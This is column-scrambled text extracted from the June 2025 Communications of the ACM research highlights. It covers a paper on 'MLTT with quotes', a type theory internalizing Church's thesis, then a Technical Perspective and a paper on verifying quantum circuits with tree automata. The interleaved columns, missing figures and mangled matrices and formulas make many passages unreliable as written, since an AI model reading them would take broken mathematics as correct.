where 〈 M〉is some term derived from Min a systematic way. 𝖢𝖳Σwith a stripped-down version of 𝖬𝖫𝖳𝖳without the so-
Depending on the pursued goal, this process is variously called ξ rule:
known in the type theory world as extraction18 or quota- Γ, x : A ⊢ M ≡ N : B
____________________________
Γ ⊢ λx : A. M ≡ λx : A. N : Πx : A. B
tion.21 Obviously, a rule that is derivable for closed sequents
is not necessarily internalizable in the theory, so there is a The model used to prove this fact is a variant of Kleene re-
non-trivial gap to fill there. alizability tailored for dependent types. Briefly, in this mod-
An additional issue is that dependent type theories have el, terms are interpreted directly as their code in Kleene’s
various notions of existence. Typically, they contrast depen- first algebra, that is, a natural number, and the equational
dent sum types Σ x : A. Bwith existential types ∃ x : A. B. The theory in a context is defined as the closure of code equality
precise details depend on the exact theory considered, but by ground substitutions.
the general rule is that the former corresponds to actual, This representation makes the implementation of 𝖢𝖳 Σ
constructive evidence, while the latter stands for mere exis- trivial, as it boils down to the identity. Yet, for this to work, it
tence—that is, no computational content can be extracted is critical that two functions convertible in the model have
from this type. Such non-computational types are called literally the same code. This is exactly where the restriction
propositions, an umbrella term for mildly related concepts. to ground substitutions comes into play, as it will identify
The three most common instances of propositions are cap- functions with their concrete syntax. Unfortunately, the
tured by the realizability-driven 𝙿 𝚛𝚘𝚙universe of 𝖢 𝖨𝖢,18 the same restriction also destroys non-trivial higher-order
𝚑𝙿𝚛𝚘𝚙subuniverse inspired by the univalent world,24 and equations and in particular invalidates the ξ rule.
the 𝚂𝙿𝚛𝚘𝚙universe of strict propositions.6 Regardless of the Although we understand the difficulties experienced by
setting, Σ -types validate choice by construction through the authors of this paper and acknowledge their distinct
large elimination or projections, while existential types do goals, we consider that removing this congruence from
not, in general. 𝖬𝖫𝖳𝖳when precisely trying to implement a principle imply-
The arithmetic statement of 𝖢 𝖳mentions two existen- ing the existence of a quoting function is unarguably throw-
tial quantifiers, hence we have a priori at least four pos- ing the baby with the bath water. Ubiquitary conversion un-
sible translations into 𝖬𝖫𝖳𝖳. In practice, the second one der λ -abstractions is a stepping stone of 𝖬 𝖫𝖳𝖳for program
reasoning, so treating functions as black boxes is a no-go and error-prone, let alone when they contain bits of comput-
and the ξrule a sine qua non. ability. To keep the naysayer at bay, all proofs were mecha-
Given the strong relationship between quoting functions nized in the Coq proof assistant.
and metaprogramming, we should also mention some at-
tempts at making the latter a first-class citizen of depen- 4. BASIC TYPE THEORY
dent type theory. These systems are built with practical pro- Let us fix some conventions. Since we will be juggling quite a
gramming in mind rather than constructive mathematics, bit between levels, we will use a different font style to refer to
but the endeavours are similar enough that they are worth objects from the metatheory, with types in bold and type as-
highlighting. There is in particular a wealth of literature cription written in set-theoretic style x ∈ X. Some metatheo-
on contextual types,17 a special kind of modal type8 captur- retical types of interest are X ⇒ Y, the metafunctions from X
ing well-typed terms in an object context. Although contex- to Y, and Nthe metaintegers. We will write term for the type
tual types can coexist with dependent types, the ability to of “𝖬𝖫𝖳𝖳”terms defined later on.
pattern-match on code in these settings is still a difficult Our base theory will be an instance of 𝖬𝖫𝖳𝖳 featuring
problem that is only satisfyingly handled in the absence of one Russell-style universe, negative Π and Σ
types with defi-
dependent types.12 nitional η-rules, together with a natural number type, an
empty type, and an identity type. We recall the syntax of this
3. HIGH-LEVEL DESCRIPTION theory in Figure 1. The typing rules are standard and we let
We now give the high-level intuitions that we develop techni- the reader refer to the mechanization for details.
cally later on. In this paper, we define “𝖬𝖫𝖳𝖳”, read “𝖬𝖫𝖳𝖳 We use the usual notations A → Band A × Bfor non-
with quotes”, a minute extension of 𝖬𝖫𝖳𝖳with quoting op- dependent product and sum. We write M = Nfor 𝖨𝖽 A M N
erators that implement 𝖢𝖳 Σin a straightforward way. As al- when A is clear from the context. Similarly, we sometimes
ready explained, 𝖢𝖳
Σholds externally in 𝖬 𝖫𝖳𝖳. If we want drop the annotations of λ -abstrations and pairs. If n ∈ N, we
it as an internal rule, there are two problems to solve: first, write [n] ℕ ∈ termfor the unary numeral associated to n. We
handling terms in an arbitrary context, and second, showing write Λ : = ℕfor numbers intended to code for programs.
that our hypothetical internalization preserves conversion. Partial computations are usually defined through the
Despite the aura of complexity surrounding this question, partiality monad ℘(A) : = ℕ → 𝚘𝚙𝚝𝚒𝚘𝚗 A. Since we will only
our solution is disappointingly simple. The first problem will ever consider partial integers, we use a simpler encoding.
be handled in the most trivial way one can think of. Namely,
Definition 1 (Partial integers).
the primitives computing the internal version of 𝖢𝖳Σ will sim-
We define the type of partial integers ℕ ℘ : = ℕ → ℕ.
ply block as long as their arguments are not closed. Since the
The intuitive meaning of a partial integer P : ℕ℘ is the
return type of these primitives is first-order, this will not be a
following.
problem as it will not endanger canonicity.
• If for all n : ℕ, P
n = 0, then P is undefined.
The second problem is solved in a similarly obvious man-
• Otherwise, let n0be the smallest integer such that P
ner. Given two terms M ≡ N : ℕ → ℕone needs to ensure that
n0 = 𝖲 vfor some v. Then P
evaluates to v.
the quotation of these terms agree. In particular, the integer
code returned by these operations must be the same. This This can be easily internalized in 𝖬
𝖫𝖳𝖳.
sounds complicated, as in general two equivalent functions
Definition 2 (Step evaluation).
may have different codes. In Turing-complete languages,
Given M : ℕ℘, V : ℕ, and K : ℕ, we define the step-
this is actually impossible to achieve in a computable way,
evaluation predicate.
due to Rice’s theorem. But in 𝖬 𝖫𝖳𝖳, there is a very simple
M ⇝ V ∥ K : □
way to find a canonical representative of an equivalence
read “Mevaluates to Vin K steps” by recursion on K,
class of functions: just pick the normal form! Conversion in
that captures the above intuition. Most notably if
𝖬𝖫𝖳𝖳is decidable, as it virtually amounts to comparing the
n ∈ N, M ⇝ V ∥ [n] ℕ is convertible to
normal forms of the considered terms for syntactic equality.
This requires that all well-typed terms have a normal form, ( M 0 = 0) × ... × (M [n − 1] ℕ = 0) × (M [n] ℕ = 𝖲 V).
but this property is usually taken for granted in dependent Given the algorithmically friendly nature of 𝖬𝖫𝖳𝖳, we
type theories and will for sure hold true in “𝖬𝖫𝖳𝖳”. will pick a slightly nicer, but equivalent, phrasing of 𝖢
𝖳Σ. We
As the astute reader may complain about, this is not will merge the Kleene predicate 𝖳and its decoding function
enough in presence of η-rules, which are included in our 𝚄into a single function 𝚛 𝚞𝚗 : Λ → ℕ → ℕ℘.
system. But even in this case, our normalization trick can
Definition 3.
be adapted simply by maximally η-reducing and stripping λ
Henceforth, we will define 𝖢 𝖳in 𝖬
𝖫𝖳𝖳 as
and pair annotations from the normal form.
Πf : ℕ → ℕ. Σp : Λ. Πn : ℕ. Σk : ℕ. 𝚛𝚞𝚗 p n ⇝ f n ∥ k
Despite the intuitive simplicity of the above guiding
for some 𝖬𝖫𝖳𝖳term 𝚛 𝚞𝚗 : Λ → ℕ → ℕ℘.
ideas, proofs about dependent type theory are very tedious
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 77
research highlights
𝗠𝗟𝗧𝗧.”
Figure 3. Typing rules of “ Normal forms are, as usual, terms which cannot be sim-
plified further. Neutral forms are a subcase of the former,
intuitively capturing the notion of a term whose evaluation
is blocked due to a variable not bound to a value. In par-
ticular, they cannot trigger new conversions when they are
substituted for a variable. Our definition is standard for the
𝖬𝖫𝖳𝖳fragment, except maybe that we we ignore λ and pair
type annotations just like for the clos predicate. Only worth
Figure 4. Deep normal / neutral 𝗠𝗟𝗧𝗧 terms (excerpt). discussing are the newly introduced terms of “𝖬𝖫𝖳𝖳”.
The quote primitives do not generate any new non-neu-
tral normal forms, as their types are concrete, canonical
datatypes. They do generate new neutrals, though. The intu-
ition is that these primitives only compute on closed normal
forms, so if one of their arguments is not closed, they will
block and thus be neutral.
Notation 10.
We write clnf Mif both clos Mand dnf M.
𝗠𝗟𝗧𝗧” extensions.
Figure 5. Deep normal and neutral forms of “
𝗠𝗟𝗧𝗧.”
Figure 7. New non-congruence conversion rules of “
𝗠𝗟𝗧𝗧” extensions.
Figure 8. Step-indexed evaluation of “
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 79
research highlights
The last point is essentially stating that the metatheoreti- These predicates must satisfy a list of closure properties,
cal evaluation ⇓
and the internal evaluation 𝚛
𝚞𝚗 coincide. which are typically weaker than the ones enjoyed by the
From now on, we implicitly assume that our globally standard typing rules of 𝖬𝖫𝖳𝖳. Another way to understand
fixed computational model is adequate. The remainder of this is that logical relations turn a liberal type system,
the paper is dedicated to the proof of the following theorem. called declarative, with many closure rules that is easy to
work with, into a lower-level type system that is hardly us-
Theorem 16.
able but which is similar in spirit to the steps performed
“𝖬𝖫𝖳𝖳” is consistent and strongly normalizing. Further-
by a typing algorithm. Proofs in this generic system are in
more, any closed “𝖬𝖫𝖳𝖳” term ⊢ M : ℕ normalizes to a
some sense normalized compared to the declarative sys-
numeral.
tem. As a matter of fact, this is a way to prove decidabil-
ity of type-checking, since an algorithmic presentation of
7. A 𝗠𝗟𝗧𝗧LOGICAL RELATION PRIMER type-checking will satisfy the low-level closure properties.
We will prove Theorem 16 using a logical relation model. The A notable difference with the declarative system is that ge-
base model is basically the now-famous inductive-recursive neric typing requires making explicit the notion of neutral
one from Abel et al.,1 with a handful of surprisingly minor terms, through the introduction of neutral convertibility,
tweaks. In this section, we briefly recall the principles of which can be understood as the usual convertibility re-
Abel-style logical relations. stricted to neutral terms.
From a high-level point of view, Abel-style logical rela- In the remainder of this section, we assume fixed some
tions for 𝖬𝖫𝖳𝖳are just a glorified kind of realizability with instance of syntactic typing and reduction rules for 𝖬 𝖫𝖳𝖳.
a lot of bells and whistles. Notably, in the semantic world, Due to their sheer size and the fact they are neither surpris-
well-formed types Γ ⊩ Aare defined inductively, while well- ing nor new, we will not state the closure properties here,
typed terms p A | Γ ⊩ M : Aare defined recursively over a but rather refer to the corresponding Coq code.
proof pA ∈ Γ ⊩ A. In turn, well-typedness is extremely simi-
Definition 17.
lar to, say, Kleene realizability,23 that is, p A | Γ ⊩ M : A essen-
A set of typing rules is generic when it enjoys a specific
tially means that Mweak-head normalizes to some value V,
list of (weak) closure properties.
further satisfying some conditions depending on A. Due to
conversion being an integral part of typing, one also needs Given generic notions of typing and reduction, one can
to provide predicates for type and term convertibility at define reducibility in the abstract. Our base logical relation
some semantic type. is unchanged with regard to Abel et al.,1 so we will not give
The major departure from usual realizability in this kind the full definition here. To begin with, writing everything
of model is the proper handling of variables. All semantic in full on paper would be both unreadable and uninforma-
predicates are actually presheaves over contexts equipped tive, and probably ridden with typos. Rather, we sketch be-
with weakenings. Furthermore, neutral terms enjoy a very low some representative type formers to build intuition. We
specific status; see, for example, Lemma 22. This will turn also ignore bookkeeping details that clutter the simplicity
out to be important for our goals. of logical relations, such as universe levels. Our results are
The relation itself is parameterized by syntactic predi- backed up by a mechanized proof, so we can go for a fearless
cates for the various notions of typing and reduction. human-readable paper.
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 81
research highlights
rules for negative types are given directly as η -expansions. erasure, and thus the same closedness.
Therefore, two convertible normal forms may differ on their If not all these terms are closed, then ϱ M0 N0 and ϱ M′0
annotations or up to some η -expansion. Erasing all annota- N′0 are convertible neutral terms, we conclude as above.
tions and maximally η -reducing ensures thus that the result Otherwise, by reducibility, N0 = N′0 = [n] ℕ for some
is unique for each equivalence class. n ∈ N. Since reducibility is closed by application, we get
As a result, the logical relation instantiated with deep Γ ⊩ M N ≡ M′ N′ : ℕ. This implies that both applications
typing is a model of 𝖬 𝖫𝖳𝖳. We only have to check that the deeply evaluate to the same semantic integer, that is,
additional “𝖬𝖫𝖳𝖳”rules are also interpreted. Since seman- a series of successors ending either with 0 or a neutral.
tic self-convertibility is equivalent to semantic well-typed- By confluence, we rule out the second case as M0 N0 is
ness, it is enough to check the rules from Figure 7; the ones closed, so these terms reduce to some numeral [v] ℕ. By
from Figure 3 are a consequence of the former. confluence and standardization, M0 [n] ℕ also evaluates
to [v] ℕ. By irrelevance of erasure, ∥ M0 ∥ [n] ℕ also evalu-
Lemma 27 (Quote Reducibility).
ates to [ v] ℕ. By computational adequacy, there exists
The conversion rules for the ϙ primitive hold in the reduc-
some k 0 s.t. run ⌈⌈ M0⌉ ⌉ n k0⇓
𝖲 [v] ℕ and r un ⌈⌈ M0⌉ ⌉ n
ibility model.
k′ ⇓0 for all k ′ < k0. Given that M0 and M 0′ have the same
erasure, this also holds for M′0. Hence, Ϛ M Nand Ϛ M′ N′
Proof.
evaluate to [ k0] and ϱ M Nand ϱ M′ N′ evaluate to
We focus on the more general congruence rule. As-
[ k0, v] Ϙ. The only remaining problem is to show that this
ℕ
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 83
research highlights
DOI:10.1145/ 3 72 5 72 5
Technical Perspective
To view the accompanying paper,
visit doi.acm.org/10.1145/3725728 rh
A Symbolic Approach to
Verifying Quantum Systems
By Parosh Aziz Abdulla
may lie in
E XC E P T I O N A L A D D E D VA LU E tional program verification to develop we can lift core concepts of classical
connecting two complementary areas tools for handling quantum systems. verification, such as state-space explo-
of computer science. This statement Verification tools, in general, and for ration and symbolic reasoning, into the
is particularly true when applying ma- quantum systems in particular, would quantum setting. This extension allows
ture techniques developed in one area ideally have the following properties: the verification of quantum circuits,
to solve complex problems that arise in ˲ Flexibility: Allows flexible specifi- offering a path to applying well-estab-
a new area. The accompanying paper, cation of properties of interest lished classical paradigms in a domain
“An Automata-Based Framework for ˲ Diagnostics: Provides precise bug where formal guarantees are critical.
Verification and Bug Hunting in Quan- diagnostics In addition to its early practical
tum Circuits” by Lengál et al., is a case ˲ Automation: Operates automati- promise, the approach opens new re-
in point. It applies techniques devel- cally search directions in automata theory,
oped in logic, automata, and symbolic ˲ Scalability: Scales efficiently to where quantum structures introduce
verification to analyze the correctness verify useful programs novel mathematical challenges and op-
of quantum programs. Symbolic verification is one of the portunities. It establishes a connection
The current quest of quantum com- most successful techniques that sat- between quantum program verification
puting is achieving quantum suprem- isfy the above criteria for conventional and automata, promoting new possibil-
acy—that is, to reach the point where programs. To date, we have lacked an ities to exploit the richness of automata
we solve problems that are practically extension to the quantum realm due theory and automata-based verification
unsolvable using conventional com- to the latter’s unique mathematical in quantum computing. It is worth not-
puting. To that end, substantial recent structure and different operational ing that the methodology is not just
progress has been made in implement- principles. The core of this work is the about catching mistakes but also about
ing quantum hardware and developing innovative application of automata building trust in quantum computing
programming languages for quantum theory, a cornerstone of formal verifi- systems as we move toward an era in
computers. In many applications, sys- cation, to quantum circuit verification. which they might solve problems classi-
tem correctness is of critical impor- It combines tree automata-based rea- cal systems cannot.
tance. For instance, identifying a subtle soning with symbolic representations In conclusion, the accompanying
bug in a quantum circuit used for quan- tailored for quantum circuits, allow- paper represents a rare confluence of
tum chemistry simulations could pre- ing automated verification at unprec- disciplines, opening pathways for col-
vent incorrect predictions about mo- edented scales. It goes back to the very laboration between automata theorists,
lecular interactions, which is critical for basics of program verification by recall- quantum physicists, and software en-
drug discovery and material design. ing the classical Hoare triples {P}C{Q}, gineers. Looking ahead, this line of re-
Given the complexity of quantum where {P} and {Q} are sets of quantum search opens up exciting opportunities.
systems and the correctness require- states representing the pre-condition Could similar automata-based tech-
ments, tools for analyzing and verify- and the post-condition, and C is a quan- niques be adapted to other aspects of
ing quantum programs’ correctness tum circuit. It uses symbolic verifica- quantum software engineering? Could
are demanded. However, building veri- tion to check the validity of the triple, this approach handle quantum pro-
fication tools for quantum programs ensuring all executions of C from states gramming languages’ more abstract
is immensely challenging due to their in P result in states within Q. and flexible constructs? The authors’
probabilistic nature and the exponen- Although this is the first attempt to combination of deep theoretical in-
tial size of the computational space. use such techniques in the context of sights and practical tool development
Furthermore, there is a fundamental quantum computing, implementing sets the stage for significant advance-
difference in how conventional and the framework with a tool gives spec- ments in the field. Their results are a
quantum computers process informa- tacular results. For instance, the tool milestone for quantum circuit verifi-
tion: Conventional computers use digi- manages to verify large circuits with up cation and a beacon guiding future re-
tal bits (0s and 1s), while quantum com- to 40 qubits and 141,527 gates or catch search toward reliable quantum com-
puters deploy quantum bits (qubits) to bugs injected into circuits with up to putation.
store quantum information in values 320 qubits and 1,758 gates, while all
between 0 and 1. exiting tools fail to handle such bench- Parosh Aziz Abdulla ([email protected]) is a chaired
professor at the Department of Information
The accompanying paper addresses marks. Technology, Uppsala University, Uppsala, Sweden.
whether we can exploit the research The framework’s success is based on
community’s vast experience in conven- the groundbreaking observation that © 2025 Copyright held by the owner/author(s).
An Automata-Based
To view the accompanying Technical Perspective,
visit doi.acm.org/10.1145/3725725 tp
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 85
research highlights
One application of our framework is as a quick underap- Figure 1. Constructing the Bell state.
proximation of a quantum circuit non-equivalence test. Our
x x
approach can switch to a lightweight specification when q −→
1
(q1, q0) q −→
1
(q0, q1)
equivalence checkers fail due to insufficient resources and x x 0
q0 −→
2
(q2, q2) q2 −0→ () q1 −→
2
(q2, q3) q2 ()
still find bugs in the design. Quantum circuit (non-)equiva-
x2 x2 1/√2
lence testing is an essential part of the quantum computing q1 −→ (q3, q2) 1
q3 −→ () q0 −→ (q3, q2) q3 ()
toolkit. Its prominent use is in verifying results of circuit 1
optimization, which is a necessary part of quantum circuit (a) The TA of│00⟩. (b) The TA for √2 (│00⟩+│11⟩).
compilation to achieve the expected fidelity of quantum
algorithms running on real-world quantum computers, │x1⟩ H
which are heavily affected by noise and decoherence. Al-
ready in the world of classical programs, optimizer bugs are │x2⟩
being found on a regular basis in compilers used daily by
(c) The EPR circuit.
tens of thousands of programmers. In the world of quan-
tum, optimization is much harder than in the classical set-
ting, with many opportunities to introduce subtle and hard- In addition to the practical utility, our work also bridges
to-discover bugs into the optimized circuits. It is therefore the gap between quantum and classical verification, particu-
essential to be able to check that an output of an optimizer larly automata-based approaches such as regular model check-
is functionally equivalent to its input. ing.5 As far as we know, our approach to the verification of
Testing quantum circuit (non-)equivalence is, however, quantum circuits is the first one based on automata. The en-
a challenging task (QMA-complete).17 Due to its complexity, abling techniques and concepts involved in this work are, for
approaches that can quickly establish circuit non-equiva- example, the use of TAs to represent sets of quantum states
lence are highly desirable to be used, for example, as a pre- and express the pre- and post-conditions, the compactness
liminary check before a more heavyweight procedure (see of the TA structure enabling efficient gate operations, and
Burgholzer and Wille7 or Chen et al.8) is used. One currently our TA transformation algorithms enabling the execution of
employed fast non-equivalence check is to use random quantum gates over TAs. We believe the connection of autom-
stimuli generation.6 Finding subtle bugs by random testing ata theory with the quantum world we establish can start new
is, however, challenging—with no guarantees due to the im- fruitful collaborations between the two rich fields.
mense (in general uncountable) underlying state space. Overview. We use a concrete example to demonstrate how
Our approach can be used as follows: We start with a to use our approach. Assume we want to design a circuit con-
TA encoding the set of possible input states (created by the structing the Bell state, that is, a 2-qubit circuit converting a
user or automatically) and run our analysis of the circuit basis state |00⟩to a maximally entangled state _√1_2 ( | 00⟩ + | 11⟩).
over it, obtaining a TA 𝒜representing the set of all outputs. We first prepare TAs corresponding to the precondition
Then, we take the optimized circuit, run it over the same TA (Figure 1a) and postcondition (Figure 1b). Both TAs use q as
with inputs and obtain a TA 𝒜 ′. Finally, we check whether the root state and accept only one tree. One can see the cor-
ℒ(𝒜) = ℒ(𝒜′). If the equality does not hold, we can con- respondence between quantum states and TAs by travers-
clude that the circuits are not functionally equivalent (if the ing their structure. The precise definition will be given in
equality holds, there can, however, still be some bug that Sections 2 and 3. Our approach will then use the transform-
does not manifest in the set of output states). ers from Sections 4 to 6 to construct a TA 𝒜recognizing the
We implemented our technique in a prototype called Au- quantum states after executing the EPR circuit (Figure 1c)
toQ and evaluated it over a wide range of quantum circuits, from the precondition TA (Figure 1a). We will then use TA lan-
including some prominent quantum algorithms, randomly guage inclusion/equivalence tool VATA18 to check 𝒜 against
generated circuits, reversible circuits from RevLib,23 and the postcondition TA. If the circuit is buggy, our approach
benchmarks from the tool Feynman.2 The results show that will return a witness quantum state that is reachable from
our approach is quite scalable. We did not find any tool with the precondition but not allowed by the postcondition. From
the same functionality as ours and hence pick the closest our experience of preparing benchmark examples, in many
state-of-the art tools—a circuit simulator SliQSim21 and cir- cases, this approach helps us find bugs in incorrect designs.
cuit equivalence checkers Feynman2 (based on path-sum),
Qcec7 (combining ZX-calculus, decision diagrams, and ran- 2. PRELIMINARIES
dom stimuli generation), and SliQEC22—as the baseline tools By default, we work with vectors and matrices over complex
to compare with. In the first experiments, we evaluated Au- numbers ℂ. In particular, we use ℂm×nto denote the set of all
toQ’s capability in verification against pre- and post-condi- m × ncomplex matrices. Given a k × ℓ matrix ( axy) , its trans-
tions. We managed to verify the functional correctness (with pose is the ℓ × k matrix ( axy) T = ( ayx) obtained by flipping ( axy)
regard to one input state) of a circuit implementing Grover’s over its diagonal. A 1 × kmatrix is called a row vector and a
search algorithm with 40 qubits and 141,527 gates. We then k × 1matrix is called a column vector. To save vertical space,
evaluated AutoQ on circuits with injected bugs. The results we often write a column vector vusing its row transpose vT.
confirm our claim—AutoQ was able to find injected bugs We use Ito denote the identity matrix of any dimension
in various huge-scale circuits, including one with 320 qubits (which should be clear from the context). The conjugate of
and 1,758 gates, which other tools failed to find. a complex number a + biis the complex number a − bi, and
⎜ ⎟
A ⊗ B = ( axyB). For instance,
X′ = X ⊗ I = ( ) ⊗ ( ) = 0 0 0 1 ,
0 1 1 0
1 0 0 1 1 0 0 0
⎛ 12 1
_ 12 1 ⎞
_ ⎝0 1 0 0⎠ (3)
(− _2 0) (− _21 0)
⎜ ⎟⎜ ⎟
⎛0 0 1 0⎞ ⎛ 00⎞ ⎛ 10⎞
(1 + i) · 3 ·
⎜ ⎟
12 1
_ 1 c c
4 − 7i 0) (− _ 12 0)
( 1+i 3
⊗ = 0 0 0 1 c01 c
21 1
_ 12 1
_ v′ = X′ × v = × c = c11
(− _21 0) (− _12 0)⎠
1 0 0 0
⎝0 1 0 0⎠ ⎝c ⎠ ⎝c ⎠
⎜ ⎟
( 4 − 7i) · 0 · 10 00
⎝ 11 01
(4)
⎛ _1 + _1 i 1 + i _3 3⎞
2 2 2
21 − _12 i
−_ 0 32 0
−_ Representation of complex numbers. To achieve accuracy
=
. with no loss of precision, in this paper, when working with
2−_ 27 i 4 − 7i 0 0 ℂ, we consider only a subset of complex numbers that can be
⎝− 2 + _2 i 0⎠
7 expressed by the following algebraic encoding proposed in
0 0 (2)
Zulehner and Wille26 (and also used in Tsai et al.21):
(_
1_ ) (a + bω + c ω2 + d ω3),
k
(5)
2.1. Quantum circuits. √ 2
i_
where a, b, c, d, k ∈ ℤand ω = e , the unit vector that makes
π
4
Quantum states. In a quantum system with n qubits, the an angle of 4 5∘with the positive real axis in the complex
qubits can be entangled, and the system’s quantum state plane. A complex number is then represented by a five-tuple
can be a quantum superposition of computational basis ( a, b, c, d, k). Although the considered set of complex num-
states { | j⟩ | j ∈ {0, 1}n}. For instance, given a system with bers is only a small subset of ℂ (it is countable, while the set
three qubits x1, x2, and x3, the computational basis state ℂis uncountable), the subset is already sufficient to describe
|011⟩denotes a state where qubit x is set to 0 and qubits a set of quantum gates that can implement universal quan-
1
x2 and x3 are set to 1. The superposition is then denoted in tum computation (cf. Section 4 for more details). The alge-
the Dirac notation as a formal sum ∑ j∈{0,1} aj · | j⟩, where braic representation also allows efficient encoding of some
n
a0, a1, ... , a2 −1 ∈ ℂ are complex amplitudesa satisfying the prop- operations. For example, because ω4 = − 1, the multiplica-
n
2
erty that ∑ j∈{0,1} |aj| = 1. Intuitively, |aj|2 is the probability tion of ( a, b, c, d, k) by ω
n can be carried out by a simple right
that when we measure the state in the computational basis, circular shift of the first four entries and then taking the
we obtain the state | j⟩; these probabilities need to sum up to 1 opposite number for the first entry, namely ( − d, a, b, c, k),
for all computational basis states. We note that the quantum which represents the complex number (_ 1_2 ) k ( − d + aω +
√
state can alternatively be represented by a 2n-dimensional b ω2 + c ω3) . In the rest of the paper, we use 0 and 1to denote the
column vectorb (a0, ... , a2 −1)Tor by a pseudo-Boolean function tuples for zero and one—that is, (0, 0, 0, 0, 0)and (1, 0, 0, 0, 0),
n
T : {0, 1}n → ℂ, where T ( j) = ajfor all j ∈ {0, 1}n. In the follow- respectively. Using such an encoding, we represent quan-
ing, we will work mainly with the function representation, tum states by functions of the form T : { 0, 1}n → ℤ5.
which we will see as a mapping from the domain of assign-
ments to Boolean variables (corresponding to qubits) to ℂ. Qubit measurement. After executing a quantum cir-
For instance, the quantum state _
1_2 · | 00⟩ + _ 1_2 · | 01⟩ can cuit, one can measure the final quantum state in the
√ √
_
1_ _
be represented by the vector ( √ 2 , √ 2 , 0, 0) or the function computational basis. The probability that the qubit xj
1_ T
sented using quantum gates. A k-qubit quantum gate (that after the measurement, amplitudes of states with x j = | 1⟩
is, a quantum gate with k inputs and k outputs) can be de- become 0 and amplitudes of states with xj = | 0⟩are normal-
scribed using a 2k × 2kunitary matrix. When computing the ized using _ 1
_______________ .
√
Prob
[ ]
x = |0⟩
j
a We abuse notation and sometimes identify a binary string with its (un- 2.2. Tree automata.
signed) integer value in the most significant bit first encoding, for example
the string 0101 with the number 5.
b Observe that to satisfy the requirement for the amplitudes of quantum Binary trees. We use a ranked alphabet Σ with binary symbols
states, it must be a unit vector. f, g , ... and constant symbols c1, c 2, .... A binary tree is a ground
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 87
research highlights
term over Σ . For instance, T = f( f(c1, c2), g( f (c2, c3), c1)), Among others, 𝒜bas 3 accepts the previous tree (Ex. 1 figure,
shown below, represents a binary tree. The set of nodes of left) with the run (Ex. 1 figure, right). Observe that all tree
a binary tree T, denoted as NT, is defined inductively as a nodes satisfy the requirement of a valid run. For example,
set of words over {0, 1} such that for every constant symbol the node the transition q0⟶ 0 ( ) , 01 to
c, we define Nc = { ϵ} , and for every binary symbol f, we de- 2 x3
1 11 corresponds to
x 1
( q0, q0) , and ϵ to q⟶
q0⟶ ( q1, q0) , and so on.
1 1
fine N a . w | a ∈ { 0, 1} ∧ w ∈ NT }
f(T ,T ) = { ϵ} ∪ { , where ϵ is
a
In 𝒜 bas
0 1
the empty word and ‘.’ is concatenation. Each binary tree T 3 , we use states named q n0to denote only subtrees
is associated with a labeling function LT: { 0, 1}* → Σ, which with all zeros (0) in leaves that can be generated from here,
maps a node in Tto its label in Σ . and states named qn1 to denote only subtrees with a single 1
in the leaves that can be generated from it. Intuitively, the
f TA accepts all trees of the height 3 with exactly one 1leaf
and all other leaves 0(in our encoding of quantum states,
this might correspond to saying that 𝒜bas 3 encodes an arbi-
f g
trary computational basis state of a three-qubit system).
c1 c2 f c1
3. ENCODING SETS OF QUANTUM
STATES WITH TREE AUTOMATA
c2 c3 Observe that we can use (perfect) binary trees to encode
functions {0, 1}n → ℤ5, for example, the function represen-
Tree automata. We focus on tree automata on binary trees tation of quantum states. For instance, the tree given by the
and refer the interested reader to Comon13 for a general term
definition. A (nondeterministic finite) tree automaton (TA)
x1( x2( x3(1, 0), x3(0, 0)), x2( x3(0, 0), x3(0, 0)))
(6)
is a tuple 𝒜 = 〈Q, Σ, Δ, ℛ〉where Q is a finite set of states,
Σis a ranked alphabet, ℛ ⊆ Qis the set of root states, and encodes the function T where T(000) = 1and T(i ) = 0 for all
Δ = Δint ∪ Δleafis a set of tree transitions consisting of the set i ∈ { 0, 1}3\{000}. Since TAs can concisely represent sets of
f
Δint of internal transitions of the form q → ( q0, q1) (for a binary binary trees, they can also encode sets of quantum states.
symbol f ) and the set Δleaf of leaf transitions of the form q ⟶ c ( )
(for a constant symbol c), for q , q0, q1 ∈ Q. We can conve- Example 2 (Concise representation by TAs).
niently describe TAs by providing only the set of root states Here we consider the set of n -qubit quantum states Sn = {| i⟩
ℛand the set of transitions Δ . The alphabet and states are | i ∈ { 0, 1} } , that is, the set of all basis states. Note that
n
implicitly x1 defined asx1those that appear in Δ. For example, | Sn| =2n, which is exponential. Representing all possible basis
Δ = {q⟶ ( q1, q0), q⟶ 0 ( ) , q1⟶
( q0, q1), q0⟶ 1 ( ) } implies that states naively would require storing 22 complex numbers.
n
Σ = { x1, 0, 1} and Q = {q, q0, q1} . TAs can, however, represent such a set much more efficiently.
For the case when n = 3, the set S3 can be represented by
Run and language. A run of 𝒜on a tree Tis another tree
the TA 𝒜bas 3 from Example 1 with 3n + 1 transitions (that
ρlabeled with Qsuch that (i) Tand ρhave the same set of
is, linear-sized to the number of qubits). The TA 𝒜bas 3 can be
nodes, that is, NT = Nρ; (ii) for all leaf nodes u ∈ NT, we have
) generalized to encode the set of all n -qubit states Qn = { | i⟩
L T (u→
Lρ( u) ⎯ ( ) ∈ Δ; and (iii) for all non-leaf nodes v ∈ NT, we
( ) | i ∈ { 0, 1}n} for each n ∈ ℕ by setting the transitions to
have the transitions Lρ( u) ⎯ L T u→ (Lρ( 0 . u), Lρ( 1 . u)) ∈ Δ. The
run ρ is accepting if Lρ( ϵ) ∈ ℛ. The language ℒ( 𝒜) of 𝒜is the
set of trees accepted by 𝒜 , that is ℒ( 𝒜) = {T | there exists an
accepting runo f 𝒜 over T}.
( )
│x1⟩ X
gates on this representation. When quantum states are rep-
0 1
resented as vectors, gates are represented as matrices and │x2⟩ X =
1 0
gate operations are matrix multiplications. When states are
represented as binary trees, we need a new representation (a) X1 gate applied to qubit x1. (b) Matrix of the X gate.
for quantum gates and their operations. Inspired by the
( )
work of Tsai et al.,21 we introduce symbolic update formulae, 1 0 0 0
which describe how a gate transforms a tree representing a │x1⟩ 0 1 0 0
CNOT=
quantum state. Later, we will lift the tree update operation 0 0 0 1
│x2⟩ 0 0 1 0
to a set of trees encoded in a TA.
We use the algebraic representation of quantum states
